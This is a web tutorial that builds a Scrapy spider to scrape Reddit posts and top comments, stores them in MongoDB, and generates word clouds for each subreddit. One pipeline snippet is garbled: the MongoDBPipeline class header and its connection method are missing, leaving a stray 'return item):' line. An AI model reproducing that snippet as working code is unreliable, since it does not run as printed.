The attribute allowed_domains limits the domains the Spider is allowed to crawl; start_urls is where the Spider will start crawling. Next, we define a parse method, which will tell the Spider what to do on each of the start_urls. Here is the first part of this method's definition:
def parse(self, response):
links = response.xpath('//p[@class="title"]/a[@class="title may-blank "]/@href').extract()
titles = response.xpath('//p[@class="title"]/a[@class="title may-blank "]/text()').extract()
dates = response.xpath('//p[@class="tagline"]/time[@class="live-timestamp"]/@title').extract()
votes = response.xpath('//div[@class="midcol unvoted"]/div[@class="score unvoted"]/text()').extract()
This uses XPath to select certain parts of the HTML document. In the end, links is a list of the links for each post, titles is a list of all the post titles, etc. Corresponding elements of the first four of these lists will fill some of the fields in each instance of a RedditItem, but the top_comment field needs to be filled on the comment page for that post. One way to approach this is to partially fill an instance of RedditItem, store this partially filled item in the metadata of a Request to a comment page, and then use a second method to fill the top_comment field on the comment page. This part of the parse method's definition achieves this:
for i, link in enumerate(comments):
item = RedditItem()
item['subreddit'] = str(re.findall('/r/[A-Za-z]*8?', link))[3:len(str(re.findall('/r/[A-Za-z]*8?', link))) - 2]
item['link'] = links[i]
item['title'] = titles[i]
item['date'] = dates[i]
if votes[i] == u'\u2022':
item['vote'] = 'hidden'
else:
item['vote'] = int(votes[i])
request = Request(link, callback=self.parse_comment_page)
request.meta['item'] = item
yield request
For the ith link in the list of comment urls, we create an instance of RedditItem, fill the subreddit field with the name of the subreddit (extracted from the comment url with the use of regular expressions), the link field with the ith link, the title field with the ith title, etc. Then, we create a request to the comment page with the instruction to send it to the method parse_comment_page, and store the partially filled item temporarily in this request's metadata. The method parse_comment_page tells the Spider what to do with this:
def parse_comment_page(self, response):
item = response.meta['item']
top = response.xpath('//div[@class="commentarea"]//div[@class="md"]').extract()[0]
top_soup = BeautifulSoup(top, 'html.parser')
item['top_comment'] = top_soup.get_text().replace('\n', ' ')
yield item
Again, XPath specifies the HTML to extract from the comment page, and in this case, BeautifulSoup removes HTML tags from the top comment. Then, finally, we fill the last part of the item with this text and yield the filled item to the next step in the scraping process.
The next step is to tell Scrapy what to do with the extracted data; this is done in the item pipeline. The item pipeline is responsible for processing the scraped data, and storing the item in a database is a typical such process. We chose to store the items in a MongoDB database, which is a document-oriented database (in contrast with the more traditional table-based relational database structure). Strictly speaking, a relational database would have sufficed, but MongoDB has a more flexible data model, which could come in use if I decide to expand on this project in the future. First, we have to specify the database settings in settings.py (another file initially created by Scrapy):
BOT_NAME = 'reddit'
SPIDER_MODULES = ['reddit.spiders']
NEWSPIDER_MODULE = 'reddit.spiders'
DOWNLOAD_DELAY = 2
ITEM_PIPELINES = {'reddit.pipelines.DuplicatesPipeline':300,
'reddit.pipelines.MongoDBPipeline':800, }
MONGODB_SERVER = "localhost"
MONGODB_PORT = 27017
MONGODB_DB = "reddit"
MONGODB_COLLECTION = "post"
The delay is there to avoid violating Reddit's terms of service. So, now we've set up a Spider to crawl and parse the HTML, and we've set up our database settings. Now we need to connect the two in pipelines.py:
import pymongo
from scrapy.conf import settings
from scrapy.exceptions import DropItem
from scrapy import log
class DuplicatesPipeline(object):
def __init__(self):
self.ids_seen = set()
def process_item(self, item, spider):
if item['link'] in self.ids_seen:
raise DropItem("Duplicate item found: %s" % item)
else:
self.ids_seen.add(item['link'])
return item):
valid = True
for data in item:
if not data:
valid = False
raise DropItem("Missing {0}!".format(data))
if valid:
self.collection.insert(dict(item))
log.msg("Added to MongoDB database!",
level=log.DEBUG, spider=spider)
return item
The first class is used to check if a link has already been added, and skips processing that item if it has. The second class defines the data persistence. The first method in MongoDBPipeline actually connects to the database (using the settings we've defined in settings.py), and the second method processes the data and adds it to the collection. In the end, our collection is filled with documents like this:
The real work was done in actually scraping the data. Now, we want to use it to create visualizations of frequently used words across the ten subreddits. The Python module wordcloud does just this: it takes a plain text file and generates word clouds like the one you see above, and with very little effort. The first step is to write the post titles and top comments to text files.
import sys
import pymongo
reload(sys)
sys.setdefaultencoding('UTF8')
client = pymongo.MongoClient()
db = client.reddit
subreddits = ['/r/circlejerk', '/r/gaming', '/r/FloridaMan', '/r/movies',
'/r/science', '/r/Seahawks', '/r/totallynotrobots',
'/r/uwotm8', '/r/videos', '/r/worldnews']
for sub in subreddits:
cursor = db.post.find({"subreddit": sub})
for doc in cursor:
with open("text_files/%s.txt" % sub[3:], 'a') as f:
f.write(doc['title'])
f.write('\n\n')
f.write(doc['top_comment'])
f.write('\n\n')
client.close()
The first two lines after the imports are there to change the default encoding from ASCII to UTF-8, in order to properly decode emojis (of which there were many in the comments). Finally, we use these text files to generate the word clouds:
import numpy as np
from PIL import Image
from wordcloud import WordCloud
subs = ['circlejerk', 'FloridaMan', 'gaming', 'movies',
'science', 'Seahawks', 'totallynotrobots',
'uwotm8', 'videos', 'worldnews']
for sub in subs:
text = open('text_files/%s.txt' % sub).read()
reddit_mask = np.array(Image.open('reddit_mask.jpg'))
wc = WordCloud(background_color="black", mask=reddit_mask)
wc.generate(text)
wc.to_file('wordclouds/%s.jpg' % sub)
The WordCloud object uses reddit_mask.jpg as a canvas: it only fills in words in the black area. Here's an example of what we get (generated from posts on /r/totallynotrobots):
After all of this, I am now a big fan of Scrapy and everything it can do, but this project has certainly only scratched the surface of its capabilities.
If you care to see the rest of the word clouds you can find them here; the code for this project can be found here.
Views: 6820
Comment
© 2019 Data Science Central ®
Badges | Report an Issue | Privacy Policy | Terms of Service
You need to be a member of Data Science Central to add comments!
Join Data Science Central
|
https://www.datasciencecentral.com/profiles/blogs/scraping-reddit
|
CC-MAIN-2019-47
|
refinedweb
| 1,694
| 63.49
|
These notes are for developing a C++ application. If you are a developing a .NET/C# application please see our .NET Wiki instead.
Checklist
Before we begin, you’ll need the following:
- The latest Awesomium 1.7 SDK for Mac OSX (download it here)
- An Intel Mac running Mac OS X 10.6 (“Snow Leopard”) or higher.
- XCode 3.1.2 or higher
Install the SDK
Run the installer and follow the on-screen instructions.
Once installation is complete you should find samples under your
/Applications directory and a copy of
Awesomium.framework at
/Library/Frameworks
Set up your project
Configure project settings
- Create a new project in XCode (either a Cocoa Application or Command Line Tool).
- Double click your project to open Project Info and select the Build tab. 1. Select All Configurations in the Configuration drop-down list. 1. Under the Architectures property, make sure 32-bit Universal is selected. 1. Under the Valid Architectures property, remove all architectures except i386. 1. Under the Framework Search Paths property (you may need to scroll down a bit to find it), add the path that contains the Awesomium.framework you copied earlier.
Link against the framework
To use Awesomium in your Mac OSX application, you will need to link against the Awesomium framework.
There are actually a couple of ways you can do this:
- Drag and drop Awesomium.framework onto the name of your project in XCode’s Groups & Files panel. In the dialog that appears, make sure your project is selected under Add To Targets.
- OR double-click the name of your Application under the Targets list in XCode’s Groups & Files panel. Select the General tab and then click the + symbol under Linked Libraries. Click Add Other at the bottom of the dialog that appears and then browse to and select Awesomium.framework.
Copy the framework to your build distribution
If you don’t wish to install
Awesomium.framework to your users’
/Library/Frameworks folder, there are a couple other ways to bundle the framework with your application based on what you’re building.
If your project is using an Application Bundle (e.g., you’re creating a Cocoa Application):
- Right-click your Application’s name under Targets in XCode’s Groupes & Files panel.
- Select Add -> New Build Phase -> New Copy Files Build Phase.
- In the dialog that appears, select Frameworks under the Destination drop-down list.
- Close the dialog.
- Expand your Application’s list of build phases (just click the little triangle next to your Application’s name under Targets to expand the list).
- Drag and drop Awesomium.framework onto the Copy Files build phase that you just created (should be the one at the bottom of the list).
- The Awesomium framework should automatically be copied into your Application Bundle every time you build your application.
If your project is NOT using an Application Bundle (e.g., you’re creating a Shell Tool):
- Create a folder named Frameworks in the directory above the directory that contains your built executable (this will usually end up being the
builddirectory of your XCode project).
- Copy Awesomium.framework to the Frameworks folder.
- Your directory structure should look like the following:
¦ +---SomeDirectory ¦ +---YourExecutable ¦ +---Frameworks +---Awesomium.framework
Include the API
To include the entire API for Awesomium in your source files, you simply need to include WebCore.h.
#include <Awesomium/WebCore.h>
|
http://wiki.awesomium.com/getting-started/setting-up-on-macosx.html
|
CC-MAIN-2017-04
|
refinedweb
| 559
| 57.87
|
Sometimes we may wish to save Python objects to disc (for example if we have performed a lot of processing to get to a certain point). We can use Python’s pickle method to save and reload any Python object. Here we will save and reload a NumPy array, and then save and reload a collection of different objects.
Saving a single python object
Here we will use pickle to save a single object, a NumPy array.
import pickle import numpy as np # Create array of random numbers: my_array= np.random.rand(2,4) print (my_array) Out: [[0.6383297 0.45250192 0.09882854 0.84896196] [0.97006917 0.29206495 0.92500062 0.52965801]]
# Save using pickle filename = 'pickled_array.p' with open(filename, 'wb') as filehandler: pickle.dump(my_array, filehandler)
Reload and print pickled array:
filename = 'pickled_array.p' with open(filename, 'rb') as filehandler: reloaded_array = pickle.load(filehandler) print ('Reloaded array:') print (reloaded_array) Out: Reloaded array: [[0.6383297 0.45250192 0.09882854 0.84896196] [0.97006917 0.29206495 0.92500062 0.52965801]]
Using a tuple to save multiple objects
We can use pickle to save a collection of objects grouped together as a list, a dictionary, or a tuple. Here we will save a collection of objects as a tuple.
# Create an array, a list, and a dictionary my_array = np.random.rand(2,4) my_list =['A', 'B', 'C'] my_dictionary = {'name': 'Bob', 'Age': 42}
# Save all items in a tuple items_to_save = (my_array, my_list, my_dictionary) filename = 'pickled_tuple_of_objects.p' with open(filename, 'wb') as filehandler: pickle.dump(items_to_save, filehandler)
Reload pickled tuple, unpack the objects, and print them.
filename = 'pickled_tuple_of_objects.p' with open(filename, 'rb') as filehandler: reloaded_tuple = pickle.load(filehandler) reloaded_array = reloaded_tuple[0] reloaded_list = reloaded_tuple[1] reloaded_dict = reloaded_tuple[2] print ('Reloaded array:') print (reloaded_array) print ('\nReloaded list:') print (reloaded_list) print ('\n Reloaded dictionary') print (reloaded_dict) Out: Reloaded array: [[0.40193978 0.55173167 0.89411291 0.84625061] [0.86540981 0.27835353 0.43359222 0.31579122]] Reloaded list: ['A', 'B', 'C'] Reloaded dictionary {'name': 'Bob', 'Age': 42}
|
https://pythonhealthcare.org/2019/01/30/118-python-basics-saving-python-objects-to-disk-with-pickle/
|
CC-MAIN-2020-29
|
refinedweb
| 332
| 57.27
|
Hi, I'm a novice when it comes to programming. Right now I'm in college taking my first class on C++, but our first homework assignment is in C.
Anyways, the first programming assignment is fairly large and I've been working on it for a few days now.
However, there's a certain part of the program where I'd love to utilize structures and dynamically allocated arrays for a specific purpose.
I created a test program in C to kinda test out what I want to do...but I can't get it to compile. (If it doesn't compile, then surely it won't work in the grand scheme of things.)
I would be grateful if anyone can point me in the right direction and help me find a solution for what I want to accomplish.
Basically I'm trying to create a structure that contains a dynamically allocated array of structures, with each of these structures containing a dynamically allocated array of integers. So far I've been unsuccessful in getting something like this to compile (I use g++ if that matters)...
I've fiddled around a bit...but I can't get it to compile. What am I doing wrong? Is there some kind of looping involved?I've fiddled around a bit...but I can't get it to compile. What am I doing wrong? Is there some kind of looping involved?Code:#include <stdio.h> #include <stdlib.h> // I want to create a "parent structure" // that is capable of holding a dynamically allocated // array of "child structures" // // each of these "child structures" would then hold // a dynamically allocated array of integers.. // "child structure" typedef struct { int *numbers; // dynamically allocated array of ints } child_structure; // "parent structure" typedef struct { child_structure *items; // dynamically allocated array of child stucts } parent_structure; int main(void) { parent_structure test; int N, n; // first i dynamically allocate the array of child structures... test.items = (child_structure *)malloc(sizeof(child_structure) *N); // then i dynamically allocate the array of integers in each of child structures // ... at least that's what i'm trying to do! test.items.numbers = (int *)malloc(sizeof(int) *n); return (0); }
Thanks in advance for the help.
|
http://cboard.cprogramming.com/c-programming/120159-structures-dynamically-allocated-arrays.html
|
CC-MAIN-2015-27
|
refinedweb
| 367
| 57.27
|
I came across a lovely bug lately. Integer arithmetic, especially in C and C++ it seems, is error-prone. In addition to the risk of having the wrong expressions altogether (a logic error, one could say), integer arithmetic is subject to a number of pitfalls, some I have already discussed here, here, and here. This week, I discuss yet another occasion for error using integer arithmetic.
Consider this piece of code, one that you have seen many times probably, at least as a variation on the theme:
int cost=INT_MAX; /* here goes code that may or mayn't assign cost */ int adjusted_cost=cost+extra_cost; if (cost+extra_cost<best_cost) best_cost=adjusted_cost;
Can you see what’s the problem with this code (besides the fact that it may or mayn’t assign cost)? Think it over before continuing.
*
* *
The problem is that since cost is int and is initialized to INT_MAX adding anything (other than zero) to it will cause to overflow, and wrap around, which means that cost+extra_cost is now negative, and is therefore (very possibly) smaller than best_cost. The exact behavior is implementation-specific, but it will break the algorithm.
There are basically tree solutions to this kind of problem. The first is to test whether or not the value is INT_MAX. The condition becomes something like:
if ( (cost!=INT_MAX) && ( cost+extra_cost<best_cost)) { ...
(You may have noticed that this version isn’t much safer. If cost is INT_MAX-1 and extra_cost is 10, then it’s still broken. If fact, it is complicated to get arbitrary expressions like this one to behave correctly in all cases, that is, regardless of the of the values involved.)
The second solution is to replace int by an explicitly larger type but to use the same constant:
#include <stdint.h> ... int64_t cost=INT32_MAX;
Now cost+extra_cost cannot overflow/wrap-around, and the code now behaves the way it was intended, but at the cost of manipulating larger integers (which can have implementation-specific performance issues).
The third solution requires analyzing your algorithm and knowing what are the values you operate on. What is the largest possible value for cost for this algorithm? Maybe it’s 100, maybe it’s 1 000 000, or maybe it’s 200 000 000? Maybe with extra_cost always less than 1024 and cost at 1 000 000 will provide safe arithmetic in all cases. Adjusting the maximal cost to a reasonable maximum that is far from INT_MAX is a variation on the theme of using uint64_t instead of only int except that it uses int (chosen as to be a machine-efficient size) and it provides an occasion to understand and document your algorithm.
*
* *
The basic fact is that getting integer arithmetic exactly right all the time given two’s complement, modular arithmetic (and thus finite integer sizes) is really complicated. Not always, but I invite the reader to consider again the second solution above, or even the original expression. Can you write a test that checks both for overflow and test the condition correctly? How many special case will it have? What if I change int to unsigned? will it still work?
If both values are unsigned (short, int), testing for (a+b)<max(a,b) correctly detects overflows for all possible pairs of a and b. If the values are signed, it fails on many negative pairs of a and b, for example, -32768 + -17488 will yield 15280 (assuming 16 bits integers). One possible solution is to compute the carry; if there’s a carry, there’s an overflow. While the carry is readily available to the CPU, C doesn’t help much here; you’ll have to write your own:
int will_overflow(int16_t i, int16_t j) { int16_t s=i+j; int32_t s32=i+j; return s!=s32; }
Your will_overflow function doesn’t really work, it returns “yes, it will overflow” for something as simple as -32768 and 0. I think there was a formula for checking for overflow in Hacker’s Delight, I’ll take a look when I’ll finally find this book.
The original
is clearly defective, as you rightly point out. I will fix that to:
Does what it should. I’ve been looking in Hacker’s Delight and what is presented there seems to depends on the sign of the operands (leaving two branches of tests.) It does have the merit of not necessitating bigger registers to perform its tests.
I found it:
No branches ;)
Well, the above code is for addition, for subtraction the formula is ((i^j)&(difference^i))>>15.
By the way, could you fix the tags (and possibly merge the comments), please?
Excellent!
You may find this interesting:
It’s about integer wrapper types that automatically detects any overflow or divide by zero. It looks very useful. I wish it was included in boost.
I always avoided this issue by just assigning it to a large number instead of int_max. for example, if you know the value is unlikely to be more than 10,000,000 you can just put 9999999 or something.
Almost as bad as contracting “may not” to “main’t”
|
https://hbfs.wordpress.com/2011/03/15/int_max-is-a-terrible-nan-safer-integer-types-part-iv/
|
CC-MAIN-2020-29
|
refinedweb
| 856
| 61.87
|
Simple Python RGB Raspberry Pi Tutorial
Introduction: Simple Python RGB Raspberry Pi Tutorial
A
Step 1: The Circuit
The circuit is very simple. You can also use a breadboard and some jumper cable.
Follow the scheme, and solder the components on the perfboard. Use a RGB common cathode and 3 resistor. Use the 120 Ohm resistor for blue and green pin and 100 Ohm for red pin.
Step 2: Plug the Circuit
Now.
Step 3: Start the Raspberry by Terminal
Now.
Step 4: Write the Program
Type on the terminal:
sudo nano rgb.py
After this put the code in the terminal window.
(see the py file)
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
RED = 25
GREEN = 24
BLUE = 23
GPIO.setup(RED,GPIO.OUT)
GPIO.output(RED,0)
GPIO.setup(GREEN,GPIO.OUT)
GPIO.output(GREEN,0)
GPIO.setup(BLUE,GPIO.OUT)
GPIO.output(BLUE,0)
try:
while (True):
request = raw_input(“RGB—>”)
if (len(request) == 3):
GPIO.output(RED,int(request[0]))
GPIO.output(GREEN,int(request[1]))
GPIO.output(BLUE,int(request[2]))
except KeyboardInterrupt:
GPIO.cleanup()
Push CTRL + X button and save the rgb.py file.
Step 5: Command the RGB Led by the Terminal
Now you can start the program.
Write
sudo python rgb.py
You can read RGB-->
Now use 0 for OFF the color and 1 for ON color.
Use first number for Red, second number for Green and third for Blue.
For blue write 001 and after click enter
For green write 010 and after click enter
For red write 100 and after click enter
The fun comes when you start mixing colors.
Try 101 click enter and see the color.
|
http://www.instructables.com/id/Simple-Python-RGB-Raspberry-Pi-Tutorial/
|
CC-MAIN-2017-43
|
refinedweb
| 280
| 68.67
|
file_reader
Description
You found a service that is hard to understand. Will you be able to exploit it?
TL;DR
This service reads two lines from the user, the first one is used to define the offset at which the data of the second line will be written.
The user input is a string of characters consisting of numbers, which is transformed into a 32-bit integer and then into a 64-bit signed integer.
The program doesn’t display anything and so it has no function to leak the libc address or a stack value (no
printf,
puts, etc.).
The exploit consists of several steps which consist in making a stack lifting, reading step 2 in the
.bss segment, calculating the address of the one_gadget from a GOT entry and getting a shell.
Reverse engineering
After some time of analysis, we get the following functions:
get_line()
Description: read user input and return if it starts with “END” or ‘\n’.
convert()
Description: convert the user input to a 32-bits integer, signed on 64 bits.
write_what_where()
Description: write the line_2 at the line_1 stack offset.
main()
Description: get two lines, convert them to integers and call write_what_where until the lines don’t start with “END” or “\n”.
Methodology
We’ve a write_what_where primitive, but we can’t read data so we can’t leak libc address from a GOT entry or from the stack.
Since we’re able to write anywhere on the stack (as long as the offset doesn’t exceed the size of a 32-bit integer), we should be able to
overwrite the return address of the
get_line function and create a ROP that will allow us to resolve a libc function address and call it.
The magic gadget
Reading the assembly instructions of the program, we find the following sequence:
It’s a valuable gadget allowing us to add the value of
rax register to the value contained in
rbp-0x30 and to store the result at
rbp-0x18.
What makes this gadget so magic is that it will allow us to take the address of a libc function (for example a GOT entry) and store the address
of another function (for example the system address).
GOT entries
Looking at the
.got.plt section, we see that the program imports five functions from the libc:
The exploit will consist of placing the offset of a libc function in the
rax register, adding it to the
__libc_start_main function address, overwriting a GOT entry with the calculated address and calling it.
Final exploit
#!/usr/bin/env python from pwn import * import ctypes context.clear(arch='amd64', os='linux', log_level='info') LOCAL = False p = None def int64(value): return ctypes.c_int(value).value # gdb -q ./vuln -p $(pgrep -f vuln) -ex 'b *0x400771' def create_process(local=LOCAL): global p if local: p = process(context.binary.path) else: p = remote(host='filereader.chall.malicecyber.com', port=30303) def write(what, where, qword=True): parts = [ (what >> 0) & 0xffffffff, ] if qword: parts.append((what >> 32) & 0xffffffff) for i, part in enumerate(parts): payload = b'' payload += str(int64(where+i)).encode('latin-1') payload += b'\n' payload += str(int64(part)).encode('latin-1') p.sendline(payload) # Load ELF files. elf = context.binary = ELF('./vuln', checksec=False) # Add symbols. elf.sym['write_what_where'] = 0x400749 elf.sym['get_line'] = 0x4005d6 elf.sym['convert'] = 0x400637 elf.sym['main'] = 0x400772 # Create process and pause the script so that we have the time to run gdb over this process. create_process() # pause() # Gadgets. # ropper --file ./vuln -r -a x86_64 --search "mov [%]" mov_rax_ptr_rbp_min18__add_rsp_0x38__pop_rbx_rbp = 0x40073e add_rsp_0x38__pop_rbx_rbp = 0x400742 get_line = elf.sym['get_line']+0x8 pop_rsi_r15 = 0x400881 pop_rbx_rbp = 0x400746 call_rbp48 = 0x4005d5 pop_rdi = 0x400883 pop_r15 = 0x400882 magic = 0x4006a9 ret = 0x400471 # Variables. bss_buf = elf.bss()+0x80 ## # Stage 1 - stack lifting + read in BSS. # offset=-0x36; write(0xdeadbeef, offset) # rbx (junk) offset+=2; write(bss_buf+0x18, offset) # rbp (bss) offset+=2; write(pop_rdi, offset) # pop rdi offset+=2; write(bss_buf, offset) # rdi (buffer) offset+=2; write(pop_rsi_r15, offset) # pop rsi, r15 offset+=2; write(0xffff, offset) # rsi (size) offset+=2; write(0xdeadbeef, offset) # r15 (junk) offset+=2; write(get_line, offset) # call fgets(rdi, rsi, stdin) # Actual pivot. write(add_rsp_0x38__pop_rbx_rbp, -0x46, qword=False) # overwrite LSB of return address (we can't make two writes before return) ## # Stage 2 - compute one_gadget address + call one_gadget. # # one_gadget ./libc.so.6 if LOCAL: libc = ELF(elf.libc.path, checksec=False) one_gadget = 0x3f35a else: libc = ELF('./libc.so.6', checksec=False) one_gadget = 0x41374 one_gadget_offset = one_gadget - libc.sym['__libc_start_main'] # Junk value + some value to be popped out. payload = b'' payload += pack(0xdeadbeef) # junk value payload += pack(one_gadget_offset) # rax value (popped before calling magic gadget) payload += pack(ret)*2 # retsled (junk) # Overwrite strlen@got with popret. payload += pack(pop_rbx_rbp) # pop rbx, rbp payload += pack(0xdeadbeef) # rbx (junk) payload += pack(bss_buf+0x60) # rbp payload += pack(pop_rdi) # pop rdi payload += pack(elf.got['strlen']) # rdi payload += pack(pop_rsi_r15) # pop rsi, r15 payload += pack(0x8) # rsi payload += pack(0xdeadbeef) # r15 payload += pack(get_line) # call fgets(rdi, rsi, stdin) # Place one_gadget_offset in rax register. payload += pack(pop_rbx_rbp) # pop rbx, rbp payload += pack(0xdeadbeef) # rbx (junk) payload += pack(bss_buf+0x20) # rbp payload += pack(mov_rax_ptr_rbp_min18__add_rsp_0x38__pop_rbx_rbp) # add rsp, 0x38; pop rbx, rbp payload += cyclic(0x38) # junk for stack lifting payload += pack(0xdeadbeef) # rbx (junk) payload += pack(elf.got['__libc_start_main']+0x30) # rbp # Overwrite __gmon_start__@got with do_system payload += pack(magic) # Call __gmon_start__@got (actually call do_system). payload += pack(pop_rbx_rbp) # pop rbx, rbp payload += pack(0xdeadbeef) # rbx (junk) payload += pack(elf.got['__gmon_start__']-0x48) # rbp payload += pack(call_rbp48) # call qword ptr [rbp+0x48] p.sendline(payload) # send stage 2. p.sendline(pack(pop_r15)) # send strlen@got value. p.interactive() p.close()
Download link: exploit.py.
Keep it simple, stupid!
Something that annoys and wastes my time on a daily basis, is to forget the KISS principle: I tend to do simple things in a stupid/overkill way.
This challenge is a perfect illustration of this problem… The first time I looked at this challenge, I didn’t directly understand the conversion that was done on the user input, so I visualized the process like this:
The idea here was to get a chosen output from an unknown input. So I thought about implementing a script based on a SAT solver allowing me to solve the equation inside the “black box process” while specifying additional constraints on the input and intermediate values (e.g., the input must be an unsigned integer).
A friend of mine told me that these 50 lines of code could probably be simplified… He was right:
from z3 import * def sat_solve(value): # Get a line that allows us to get the chosen output value. max_line_size = 10 s = Solver() line = [BitVec(f'line_{i}', 64) for i in range(max_line_size)] inter = [BitVec(f'inter_{i}', 64) for i in range(max_line_size)] out = BitVec('out', 64) for i in range(max_line_size): s.add(line[i] >= ord('0')) s.add(line[i] <= ord('9')) if i != 0: s.add(inter[i-1] <= 0x7fffffff) s.add(inter[i] == line[i] - 0x30 + 10 * inter[i-1]) else: s.add(inter[i] == line[i] - 0x30 + 10 * 0) if value >= 0: s.add(inter[-1] == value) s.add(out == inter[-1]) else: s.add(out == inter[-1]*-1) s.add(inter[-1] <= 0x80000000) s.add(out & 0xffffffff == value*-1) if (s.check() == sat): model = s.model() final = '' for i in range(max_line_size): curr_line_value = model[line[i]].as_long() curr_inter_value = model[inter[i]].as_long() final += chr(curr_line_value) final = int(final, 10) # remove 0 padding else: print(f'unsat (value={value})') return final sat_solve(-0xdeadbeef)
vs:
import ctypes def int64(value): return ctypes.c_int(value).value int64(-0xdeadbeef)
Keep it simple, stupid!
Flag
The final flag is:
ReadMyFlagg!!!!\o/
Happy Hacking!
|
https://www.aperikube.fr/docs/dghack_2020/file_reader/
|
CC-MAIN-2022-40
|
refinedweb
| 1,278
| 57.27
|
Computer Science Archive: Questions from December 25, 2011
- Anonymous asked, all deployed... Show moreERP system of Virtual University consists of three subsystems “VIS”, “LMS” and “EXAMS”, all deployed on same web server and sharing a central database (installed on the same web server).
However due to the increased number of students, VU decides to deploy these sub systems on separate web servers named VIS-Server, LMS-Server and EXAMS-Server, still all sharing a central database.
However this time the database will be installed and managed by a separate database server which will be implemented through oracle server.
Now the clients (students and instructors) can connect and request the services from these servers under following protocols:
1) Students can connect only to LMS-Server and can request services from it.
2) Instructors can connect with all three servers (i.e. LMS-Server, VIS-Server, and EXAMS-Server) and can request the desired service.
3) These servers can also connect with each other to get services as when required.
4) No client i.e. neither the students nor the instructors can directly connect with database server.
Question:
Keeping in mind the Krutchen’s 4+1 architectural view model, draw a diagram to represent the deployment view (also called physical view) of the above system.
Also explain the diagram with in four to five lines.
Note:
1. Carefully study the 4+1 architectural view model before attempting the assignment.
2. You can use any set of notations to draw the diagram.
3. Explanation should not exceed more than 5 lines.
• Show less1 answer
- haddam10 asked() in the program in... Show more
This assignment is about Arrays:
Complete the body of the function swap_arrays() in the program in below to swap the input arrays ar1 and ar2. Notice that these two formal parameters correspond to the actual parameters firstar and secondar in the main() function:
firstar
0 1 2 3 4
secondar
0 1 2 3 4
After executing the line (see main() function)
swap_arrays(firstar,secondar);
The two arrays will be swapped as shown below:
firstar
0 1 2 3 4
secondar
0 1 2 3 4
The Program which should be completed by swaping in below:
#include <stdio.h>
#define ARRAY_SIZE 5
void swap_arrays(int ar1[],int ar2[]);
int main()
{
int firstar[] = {1,3,5,7,9};
int secondar[] = {2,4,6,8,10};
swap_arrays(firstar,secondar);
printf("Let us check that the swap was done successfully\n");
printf("Printing the array firstar\n");
for (int i=0;i < ARRAY_SIZE;i++)
printf("firstar[ %d] = %d\n",i,firstar[i]);
printf("Printing the array secondar\n");
for (int i=0;i < ARRAY_SIZE;i++)
printf("secondar[ %d] = %d\n",i,secondar[i]);
return 0;
}
void swap_arrays(int ar1[],int ar2[])
{
}• Show less3 answers
- Anonymous asked(Duplicare Elimination ) use a one -dimensional array to solve the following problem .read in 20 num... Show more
(Duplicare Elimination ) valuse , display only the unique valuse that the user entered. provide for the "worst case" in which all 20 numbers are different .use the smallest possible array to solve this problem.• Show less4 answers
- Anonymous askedWrite a C++ program that maintains a sample address book system stored in a sequential text file and... Show more
Write a C++ program that maintains a sample address book system stored in a sequential text file and processed using a linked list data structure.
Your program will use a dynamic linked list built using a self-referential structure. The program will allow for the allocation and use of memory as needed. For instance, if the user wants to add a new record, then immediately (at run time, hence dynamically) a new memory allocation is requested and the new record is stored there. If another record is requested, then yet another memory allocation is made and "linked" to the first one to form a linked list data structure.
A contact record contains the following items:
- Last name (string),
- First name (string),
- City (string),
- Phone number (string).
The records are kept in a sequential text file named "contactlist.txt". In this file you will store all the records in a format that you would be able to read back later when requested and display the contents accordingly.
Important considerations:
Your program should:
- Be a menu driven that makes use of some enumeration to represent the different option as per the provided executable (see sample run note)
- Be interactive and allow requests from the user. Keep interacting with the user until "quit" is selected from the menu.
- The phone number is entered as a local number only (that is no need for any codes etc). Note that in the file it should be stored as originally entered.
- Use a sequential text data file to store your records. Your program should read the text file records into a linked list data structure when it starts execution, and, before it exists, write the records from the linked list structure to the same data file overwriting the old content of the data file.
- For simplicity, when a file is saved, the contents of the existing files are wiped out and replaced. When a file is loaded, the contents of the list in memory is wiped out and loaded with the new values.
- You can assume that the name of city is made of a single word.
- Assume no duplicate records are in the data.
- Implement a linear search that is capable of searching your entire list based on the last name.
- Write any functions you feel are necessary.
contactlist.txtAli• Show less
Noora
Dubai
34526672
Salem
Abdualla
Muscat
68774618
Al-Arabi
Fatima
Nizwa
12345678
Elhadi
Mohamed
Zawia
234456783 answers
- Anonymous askedYou are required to write an Assembly program that shall be executed as Terminate and Stay Resident... Show moreYou are required to write an Assembly program that shall be executed as Terminate and Stay Resident (TSR) program and performs the following operations.
• When the key h is pressed, string Hello will be displayed on screen.
• When the key w is pressed, string World will be displayed on screen.
• When the key c is pressed, whole screen will be cleared.
• Show less3 answers
- sullyjr33 askedWrite a main function and the following functions to compute the stress and strain in a steel rod of... Show more
Write a main function and the following functions to compute the stress and strain in a steel rod of diameter D (inches) and length L (inches) subject to the compression loads P of 10,000 to 1,000,000 lbs. in increments of 100,000 pounds. The modulus of elasticity E for steel is 30 x 10^6
Function to compute stress from the formulas
Stress f = P/A where A = ∏D^2/4.0
Function to compute strain from the formulas
Elongated of shortened length Δ L = fL/E strain e = Δ L/L = f/E
Functioin to output the stress and strain at different loads of P
Main• Show less
Calculate stress calculate strain output4 answers
- Anonymous askedI got this program who compiled succesfully but, when I execute it, it keeps saying "The system cann... Show moreI got this program who compiled succesfully but, when I execute it, it keeps saying "The system cannot find the file specified." how do I create files that the program can read from and write to? How should I call this files so the program can find them? Here is the program:
import java.io.*;
class InputOutput
{
public static void main(String args[])throws Exception
{
FileReader fr = new FileReader("Hello.in");
FileWriter fw = new FileWriter("Hello.out");
int ch;
ch = fr.read();
while(ch != -1)
{
if((char)ch>='A' && (char)ch<='Z')
ch = ch +('a'-'A');
fw.write((char)ch);
ch = fr.read();
}
fr.close();
fw.close();
}
}
• Show less5 answers
- Anonymous askedImplement INSERTION-SORT and MERGE-SORT in the programming language of your choice. Determine experi... Show more
Implement INSERTION-SORT and MERGE-SORT in the programming language of your choice. Determine experimentally the largest value of n (number of elements in the sequence to be sorted) for which INSERTION-SORT is still faster than MERGE-SORT.• Show less
Now modify your code for MERGE-SORT such that it calls INSERTION-SORT as a subroutine for input sizes not greater than the value determined by experiment.
Draw a diagram that shows the running times of INSERTION-SORT, MERGE-SORT and the hybrid INSERTION-MERGE-SORT algorithm for various input sizes n. You should perform all your experiments on the same machine and using the same programming language. Since the actual running time depends on the input sequence, use several random input sequences to produce an average running time for each value of n tested.
Briefly describe the observed behavior of the three algorithms for values of n both smaller and larger than the cross-over value determined experimentally. Also hand in a printed copy of the code used in the experiments.
Note:
You may use the system time to measure the running time of an algorithm with high precision (up to milliseconds). See for details on how to do this in C++. The function below returns the current time in milliseconds.
int time_s()
{//computes system time in milliseconds
